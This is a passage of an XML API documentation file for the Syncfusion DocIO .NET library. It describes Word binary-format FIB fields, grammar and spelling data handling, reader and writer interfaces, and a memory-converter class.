        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfBkfMoveTo">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF BKF move to.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfBklMoveTo">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKL move to.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfBklMoveTo">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF BKL move to.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcUnused1">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbUnused1">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused1.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcUnused2">
            <summary>
            Gets or sets This value is undefined and MUST be ignored
            </summary>
            <value>
            The fc unused2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbUnused2">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused2.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcUnused3">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbUnused3">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused3.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcSttbfBkmkArto">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc STTBF BKMK arto.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbSttbfBkmkArto">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB STTBF BKMK arto.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfBkfArto">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKF arto.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfBkfArto">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored
            </summary>
            <value>
            The LCB PLCF BKF arto.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcPlcfBklArto">
            <summary>
            Gets or sets Undefined and MUST be ignored.
            </summary>
            <value>
            The fc PLCF BKL arto.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbPlcfBklArto">
            <summary>
            Gets or sets MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB PLCF BKL arto.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcArtoData">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc arto data.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbArtoData">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB arto data.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcUnused4">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused4.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbUnused4">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused4.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcUnused5">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused5.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbUnused5">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused5.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcUnused6">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc unused6.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbUnused6">
            <summary>
            Gets or sets This value MUST be zero, and MUST be ignored.
            </summary>
            <value>
            The LCB unused6.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcOssTheme">
            <summary>
            Gets or sets This value is undefined and MUST be ignored.
            
            </summary>
            <value>
            The fc oss theme.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbOssTheme" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007FcColorSchemeMapping">
            <summary>
            Gets or sets  This value is undefined and MUST be ignored.
            </summary>
            <value>
            The fc color scheme mapping.
            </value>
        </member>
        <!-- Badly formed XML comment ignored for member "P:Syncfusion.DocIO.ReaderWriter.Fib.FibRgFcLcb2007LcbColorSchemeMapping" -->
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CswNew">
            <summary>
            Gets or sets an unsigned integer that specifies the count of 16-bit values corresponding to fibRgCswNew that follow.
            This MUST be one of the following values, depending on the value of nFib.
            Value of nFib    cswNew
            0x00C1           0
            0x00D9           0x0002
            0x0101           0x0002
            0x010C           0x0002
            0x0112           0x0005
            </summary>
            <value>
            The CSW new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.NFibNew">
            <summary>
            Gets or sets an unsigned integer that specifies the version number of the file format that is used.
            This value MUST be one of the following.
            0x00D9
            0x0101
            0x010C
            0x0112
            </summary>
            <value>
            The n fib new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.CQuickSavesNew">
            <summary>
            Gets or sets an unsigned integer that specifies the number of times that this document was incrementally saved since the last full save. This value MUST be between 0 and 0x000F, inclusively.
            </summary>
            <value>
            The c quick saves new.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.LidThemeOther">
            <summary>
            Gets or sets the lid theme other.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The lid theme other.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.LidThemeFE">
            <summary>
            Gets or sets the lid theme far east.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The lid theme fe.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.LidThemeCS">
            <summary>
            Gets or sets the lid theme complex script.
            This value is undefined and MUST be ignored.
            </summary>
            <value>
            The lid theme cs.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.EncodingCharSize">
            <summary>
            Gets the size of the encoding character.
            </summary>
            <value>
            The size of the encoding character.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Fib.Encoding">
            <summary>
            Gets or sets the encoding.
            </summary>
            <value>
            The encoding.
            </value>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.GrammarSpelling"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.#ctor(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.GrammarSpelling"/> class.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
            <param name="hfCharPosTable">The header/footer char position table.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.Write(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Writes the specified fib.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.GetPositions(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.MakeCorrection(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord,Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Makes the correction.
            </summary>
            <param name="hfCharPosTable">The header/footer char pos table.</param>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.MakeHeaderCorrection(Syncfusion.DocIO.ReaderWriter.Biff_Records.CharPosTableRecord,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Makes the header correction.
            </summary>
            <param name="hfCharPosTable">The header/footer char pos table.</param>
            <param name="fib">The fib.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.ShiftHFPos(System.Boolean,System.Int32,System.Int32,System.Int32)">
            <summary>
            Shifts the char positions in grammar/spelling array.
            </summary>
            <param name="isGrammar">if it is grammar, set to <c>true</c>.</param>
            <param name="startHeaderCP">The start header CP.</param>
            <param name="startShiftCP">The start shift CP.</param>
            <param name="shiftValue">The shift value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.SetHFSeparatorsPos(System.Int32,System.Int32,System.Int32,System.Boolean)">
            <summary>
            Sets the header/footer separators pos.
            </summary>
            <param name="value">The value.</param>
            <param name="startIndex">The start index.</param>
            <param name="endIndex">The end index.</param>
            <param name="isGrammar">if it is grammar, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.GetPosIndex(System.Boolean,System.Int32)">
            <summary>
            Gets the index of position in grammar/spelling aray.
            </summary>
            <param name="isGrammarArray">if it is grammar array, set to <c>true</c>.</param>
            <param name="charPos">The char pos.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.ShiftPositions(System.Int32,System.Int32,System.Boolean)">
            <summary>
            Shifts the positions.
            </summary>
            <param name="startIndex">The start index.</param>
            <param name="shiftValue">The shift value.</param>
            <param name="isGrammarArray">if it is grammar array, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.UpdateGramSpellData(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Updates the grammar/spelling data.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.PlcfsplData">
            <summary>
            Gets or sets the PLCFSPL data.
            </summary>
            <value>The PLCFSPL data.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.GrammarSpelling.PlcfgramData">
            <summary>
            Gets or sets the plcfgram data.
            </summary>
            <value>The plcfgram data.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordReaderBase">
            <summary>
            Common interface for main IWordReader interface and 
            IWordSubdocumentReader interface.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.ReadChunk">
            <summary>
            Read next elementary text string*.
            </summary>
            <remarks>
            * - "elementary text string" - string, in which all symbols have the 
            identical character/paragraph/section properties.
            </remarks>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.GetImageReader(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Returns interface for reading images from word file.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.GetDrawingObject">
            <summary>
            Return object of ShapeClass.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.GetFormField(Syncfusion.DocIO.FieldType)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.ReadWatermark(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="doc"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.HasTableBody">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.StyleSheet">
            <summary>
            Gets document stylesheet.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.CurrentStyleIndex">
            <summary>
            Gets current style index.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.ChunkType">
            <summary>
            Gets current read text chunk type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.TextChunk">
            <summary>
            Gets current read text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.CharacterProperties">
            <summary>
            Gets character properties for current text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.ParagraphProperties">
            <summary>
            Gets paragraph properties for current text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.CurrentTextPosition">
            <summary>
            Gets current text position in document
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReaderBase.Bookmarks">
            <summary>
            Gets bookmarks.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordReader">
            <summary>
            Interface for forward-only reading data from word file.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReader.GetSubdocumentReader(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Gets subdocument reader specified type.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReader.ReadDocumentHeader(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Reads document header.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReader.ReadDocumentEnd">
            <summary>
            Reads document end.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordReader.GetBookmarks">
            <summary>
            Returns Bookmark array from word file
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.IsFootnote">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.IsEndnote">
            <summary>
            
            </summary>
        </member>
        <member name="E:Syncfusion.DocIO.ReaderWriter.IWordReader.NeedPassword">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.SectionNumber">
            <summary>
            Gets current section number.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.SectionProperties">
            <summary>
            Gets section properties for current text chunk.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.BuiltinDocumentProperties">
            <summary>
            Gets built-in Document properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.CustomDocumentProperties">
            <summary>
            Gets custom Document properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordReader.DOP">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader">
            <summary>
            Interface for reading data from subdocuments as header/footer, annotations, 
            footnotes, endnotes, etc.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader.Reset">
            <summary>
            Resets subdocument reader state, reading process restarted.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader.MoveToItem(System.Int32)">
            <summary>
            
            </summary>
            <param name="itemIndex"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader.Type">
            <summary>
            Gets subdocument reader type.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader.HeaderType">
            <summary>
            Gets current type of header / footer.
            ( if Type != WordSubdocument.HeaderFooter returns HeaderType.InvalidValue )
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentReader.ItemNumber">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordWriterBase">
            <summary>
            Summary description for IWordWriter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.WriteChunk(System.String)">
            <summary>
            Writes text to word file
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.WriteMarker(Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            Writes marker to word file
            </summary>
            <param name="chunkType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.WriteCellMark(System.Int32)">
            <summary>
            
            </summary>
            <param name="nestingLevel"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.WriteRowMark(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="nestingLevel"></param>
            <param name="cellCount"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertStartField(System.String,System.Boolean)">
            <summary>
            
            </summary>
            <param name="fieldcode"></param>
            <param name="hasSeparator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertStartField(System.String,Syncfusion.DocIO.DLS.WField,System.Boolean)">
            <summary>
            
            </summary>
            <param name="fieldcode"></param>
            <param name="fieldType"></param>
            <param name="hasSeparator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertEndField">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertFieldSeparator">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertImage(Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Insert image in the document
            </summary>
            <param name="pict"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertImage(Syncfusion.DocIO.DLS.WPicture,System.Int32,System.Int32)">
            <summary>
            Insert image in the document
            </summary>
            <param name="pict"></param>
            <param name="height"></param>
            <param name="width"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertShape(Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.ReaderWriter.DataStreamParser.PictureShapeProps)">
            <summary>
            
            </summary>
            <param name="pict"></param>
            <param name="pictProps"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertTextBox(System.Boolean,Syncfusion.DocIO.DLS.WTextBoxFormat)">
            <summary>
            Insert textbox shape to the document
            </summary>
            <param name="txbxProps">Textbox shape's properties</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertFormField(System.String,Syncfusion.DocIO.ReaderWriter.Biff_Records.FormField)">
            <summary>
            Inserts the form field.
            </summary>
            <param name="fieldcode">The fieldcode.</param>
            <param name="formField">The form field.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertBookmarkStart(System.String,Syncfusion.DocIO.DLS.BookmarkStart)">
            <summary>
            Insert start of the bookmark in the document
            </summary>
            <param name="name"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertBookmarkEnd(System.String)">
            <summary>
            Insert end of the bookmark in the document
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertWatermark(Syncfusion.DocIO.DLS.Watermark,Syncfusion.Layouting.UnitsConvertor,System.Single)">
            <summary>
            Inserts the watermark.
            </summary>
            <param name="watermark">The watermark.</param>
            <param name="initsConvertor">The initialize converter.</param>
            <param name="maxWidth">Maximal width.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.WriteSafeChunk(System.String)">
            <summary>
            Writes text to word file
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.InsertFieldIndexEntry(System.String)">
            <summary>
            Inserts the field index entry.
            </summary>
            <param name="fieldCode">The field code.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.StyleSheet">
            <summary>
            Gets/sets stylesheet.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.CurrentStyleIndex">
            <summary>
            Gets/sets index of current style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.CharacterProperties">
            <summary>
            Gets/sets character properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.ParagraphProperties">
            <summary>
            Gets/sets paragraph properties
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.BreakCharProperties">
            <summary>
            Gets/sets character properties for paragraph end symbol
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriterBase.ListProperties">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordWriter">
            <summary>
            Summary description for IWordWriter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriter.WriteDocumentHeader">
            <summary>
            Writes document header to word file.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriter.WriteDocumentEnd(System.String,System.String,System.UInt16,System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage})">
            <summary>
            Writes document end to word file.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriter.GetSubdocumentWriter(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Returns interface for writing subdocument.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordWriter.InsertPageBreak">
            <summary>
            Inserts PageBreak into the document.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriter.DOP">
            <summary>
            Gets/sets document properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriter.SectionProperties">
            <summary>
            Gets/sets section properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriter.BuiltinDocumentProperties">
            <summary>
            Gets Built-in Document Properties.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordWriter.CustomDocumentProperties">
            <summary>
            Gets Custom Document Properties.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter">
            <summary>
            Summary description for IWordSubdocumentWriter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter.WriteDocumentEnd">
            <summary>
            Writes end of the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter.WriteItemStart">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter.WriteItemEnd">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.IWordSubdocumentWriter.Type">
            <summary>
            Gets/sets type of subdocument
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.MemoryConverter">
            <summary>
            Class that encapsulates pointer to unmanaged memory block
            and used to convert managed memory block (byte array)
            into managed object.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.DEF_MEMORY_BLOCK_SIZE">
            <summary>
            Default memory block size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.DEF_MIN_BLOCK_SIZE">
            <summary>
            Minimum memory block size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.DEF_MAX_BLOCK_SIZE">
            <summary>
            Maximum memory block size.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.DEF_OUT_OF_MEMORY_MSG">
            <summary>
            Exception message for OutOfMemoryException.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.m_memoryBlock">
            <summary>
            Pointer to the memory block.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.m_iMemoryBlockSize">
            <summary>
            Size of the memory block.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.MemoryConverter.m_instance">
            <summary>
            Instance of memory converter.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.MemoryConverter"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.#ctor(System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.MemoryConverter"/> class.
            </summary>
            <param name="iMemoryBlockSize">Size of the i memory block.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.EnsureMemoryBlockSize(System.Int32)">
            <summary>
            Ensures that memory block will be able to accept iDesiredSize bytes.
            </summary>
            <param name="iDesiredSize">Bytes that memory block should be able to accept.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">
            If iDesiredSize is larger than maximum possible memory block size.
            </exception>
            <exception cref="T:System.OutOfMemoryException">
            When was unable to allocate desired memory block size.
            </exception>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.CopyFrom(System.Byte[])">
            <summary>
            Copies data from arrData into internal memory block.
            </summary>
            <param name="arrData">Data to copy.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.CopyFrom(System.Byte[],System.Int32)">
            <summary>
            Copies data from arrData into internal memory block starting
            from specified index to the end of the array.
            </summary>
            <param name="arrData">Data to copy.</param>
            <param name="iStartIndex">Start index of the data to copy.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.CopyFrom(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Copies specified number of bytes from arrData into internal memory block starting
            from specified index to the end of the array.
            </summary>
            <param name="arrData">Data to copy.</param>
            <param name="iStartIndex">Start index of the data to copy.</param>
            <param name="iCount">Number of bytes to copy.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.CopyTo(System.Object)">
            <summary>
            Copies data from internal memory block into object.
            </summary>
            <param name="destination">Destination object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.Copy(System.Byte[],System.Object)">
            <summary>
            Copies data from byte array into specified object.
            </summary>
            <param name="arrData">Data to copy.</param>
            <param name="destination">Destination object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.Copy(System.Byte[],System.Int32,System.Object)">
            <summary>
            Copies data from byte array into specified object.
            </summary>
            <param name="arrData">Data to copy.</param>
            <param name="iStartIndex">Start index of the data to copy.</param>
            <param name="destination">Destination object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.Copy(System.Byte[],System.Int32,System.Int32,System.Object)">
            <summary>
            Copies data from byte array into specified object.
            </summary>
            <param name="arrData">Data to copy.</param>
            <param name="iStartIndex">Start index of the data to copy.</param>
            <param name="iCount">Number of bytes to copy.</param>
            <param name="destination">Destination object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.MemoryConverter.Copy(System.Object,System.Byte[],System.Int32,System.Int32)">
            <summary>
            Copies data from source object into array of bytes.
            </summary>
            <param name="source">Source object to copy.</param>
            <param name="arrDestination">Destination array.</param>
            <param name="iStartIndex">Start index in the destination array.</param>
            <param name="iLength">Length of the data to copy.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.MemoryConverter.Instance">
            <summary>
            Gets the instance.
            </summary>
            <value>The instance.</value>
        </member>
